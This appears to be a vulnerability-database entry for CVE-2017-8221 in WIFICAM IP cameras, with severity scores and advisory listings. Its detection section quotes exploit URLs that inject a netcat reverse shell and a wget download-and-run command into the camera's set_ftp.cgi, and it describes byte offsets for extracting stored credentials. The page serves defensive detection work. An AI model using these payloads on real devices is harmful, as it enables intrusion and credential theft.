CVE-2017-8221
published 2017-04-25CVE-2017-8221: Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a…
PriorityP273high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
2.69%
84.0th percentile
Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a camera device, which allows remote attackers to obtain sensitive information by sniffing the network.
Detection & IOCsextracted from sources · hover to see the quote
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0↗
bytes↗
0x0a 0x0a 0x0a 0x0a 0x01
- →Detect HTTP GET requests to /set_ftp.cgi or /ftptest.cgi containing shell command injection patterns in the 'pwd' parameter (e.g., $(nc ...), $(wget ...)) — these are the RCE trigger endpoints on port 80. ↗
- →Credential extraction from the camera config response relies on a binary marker sequence (4 consecutive 0x0a bytes followed by 0x01); credentials appear at offsets +138 (username) and +170 (password) from this marker. Monitor for unauthenticated config-dump requests. ↗
- →The exploit uses a cleartext UDP tunnel (Cloud feature) for camera communication; monitor for unencrypted UDP traffic to/from WIFICAM P2P devices carrying credential material. ↗
- →The two-stage RCE attack first injects a reverse shell command via /set_ftp.cgi (pwd parameter), then triggers execution via /ftptest.cgi. Detect the sequential pair of GET requests to these two endpoints from the same source IP. ↗
- ·The REMOTE_HOST and REMOTE_PORT values in the exploit are compile-time constants (192.168.1.1 / 1337); real-world attackers will substitute their own callback IPs and ports, so these specific values should not be treated as fixed IOCs. ↗
- ·The exploit notes an alternative credential-extraction marker (0006 0606 0606 0100 000a) and a fallback method of scanning for the string 'admin' and reading 31 bytes after it; detection logic should account for both patterns. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q969-xqr9-mmq7: Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android applicat
ghsa_unreviewed·2022-05-13
CVE-2017-8221 [HIGH] CWE-311 GHSA-q969-xqr9-mmq7: Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android applicat
Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a camera device, which allows remote attackers to obtain sensitive information by sniffing the network.
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Missing Encryption of Sensitive Data
vulncheck·2017·CVSS 7.5
CVE-2017-8221 [HIGH] wificam wireless_ip_camera_\(p2p\)_firmware Missing Encryption of Sensitive Data
wificam wireless_ip_camera_\(p2p\)_firmware Missing Encryption of Sensitive Data
Wireless IP Camera (P2P) WIFICAM devices rely on a cleartext UDP tunnel protocol (aka the Cloud feature) for communication between an Android application and a camera device, which allows remote attackers to obtain sensitive information by sniffing the network.
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
No detection rules found.
No writeups or analysis indexed.
2017-04-25
Published
Exploited in the wild